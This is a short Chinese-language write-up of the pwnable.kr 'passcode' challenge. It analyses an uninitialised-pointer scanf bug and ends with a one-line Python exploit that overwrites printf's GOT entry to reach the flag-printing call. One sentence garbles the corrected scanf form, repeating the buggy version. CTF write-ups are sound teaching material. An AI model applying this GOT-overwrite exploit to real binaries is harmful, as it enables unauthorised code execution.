Pwnable.kr Passcode 详解
复制本地路径 | 在线编辑
源代码
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
scanf("%d", passcode1);
scanf("%d", passcode2);
printf("heihei~");
if(passcode1==338150 && passcode2==13371337) {
printf("Login OK!\n");
system("/bin/cat flag");
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
welcome();
login();
return 0;
}
分析
很容易知道了,是scanf那里出了问题,应该是scanf("%d", passcode1),结果题目用了scanf("%d", passcode1),这个错误导致我们可以更改passcode1指向的地址块。(同理passcode2)
但是怎么控制passcode这两个数?还是经验不够,明明以前做过这种类似的:welcome()和login()函数是并列关系,所以welcome()执行完成后可能会有残留东西放在了login()中。本题很明显,welcome()里面的name是我们可以输入的,所以可以控制这些残留东西。
程序没开PIE,那这个真的太简单了。然而你以为就结束了?当然不是,否则我也不会单独写一篇文章了。首先第一点,好巧不巧,只能改掉passcode1,改不了passcode2。现在回头看看,真的太惯性思维了,老是想着怎么改passcode2。其实想想,我们现在不就是有了一次任意地址写的机会吗!所以只要把printf_got改成system('/bin/sh')就好了呀...
第二个问题,我要传入的地址它不是可打印的,这怎么办?
用Python呀,最终python -c "print 'A' * 96 + '\x00\xa0\x04\x08' + '134514147\n'" | ./passcode
总结
- 并列函数一定要敏感,敏感,敏感!!
- 本题整体看看吧